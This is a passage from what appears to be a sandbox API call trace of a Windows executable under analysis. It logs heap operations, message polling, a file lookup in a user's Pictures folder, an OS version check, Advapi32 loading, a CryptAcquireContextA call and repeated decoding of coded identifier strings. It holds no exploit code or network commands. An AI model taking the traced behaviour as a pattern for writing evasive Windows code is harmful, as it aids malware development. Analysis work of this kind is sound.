lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.888] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/8xG9dA2_eGqi0pv0b0.bmp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x390ac200, ftCreationTime.dwHighDateTime=0x1d5ce8b, ftLastAccessTime.dwLowDateTime=0x6d57b090, ftLastAccessTime.dwHighDateTime=0x1d5c9b3, ftLastWriteTime.dwLowDateTime=0x6d57b090, ftLastWriteTime.dwHighDateTime=0x1d5c9b3, nFileSizeHigh=0x0, nFileSizeLow=0xe0a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8xG9dA2_eGqi0pv0b0.bmp", cAlternateFileName="8XG9DA~1.BMP")) returned 0x9e1db8 [0208.888] FindClose (in: hFindFile=0x9e1db8 | out: hFindFile=0x9e1db8) returned 1 [0208.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.889] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0208.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.890] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.890] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0208.890] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.890] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0208.891] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.891] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0208.891] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.891] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.891] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0208.891] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.892] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0208.892] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.892] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.892] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0208.893] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0208.893] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0208.893] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.893] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.893] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.893] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.893] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.893] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.894] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.894] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.894] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.894] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.894] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.894] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0208.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6f80, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.894] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0208.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.895] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.895] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.895] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.895] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.895] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.896] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.896] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.897] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.897] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.897] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.897] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.897] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.897] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.898] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: 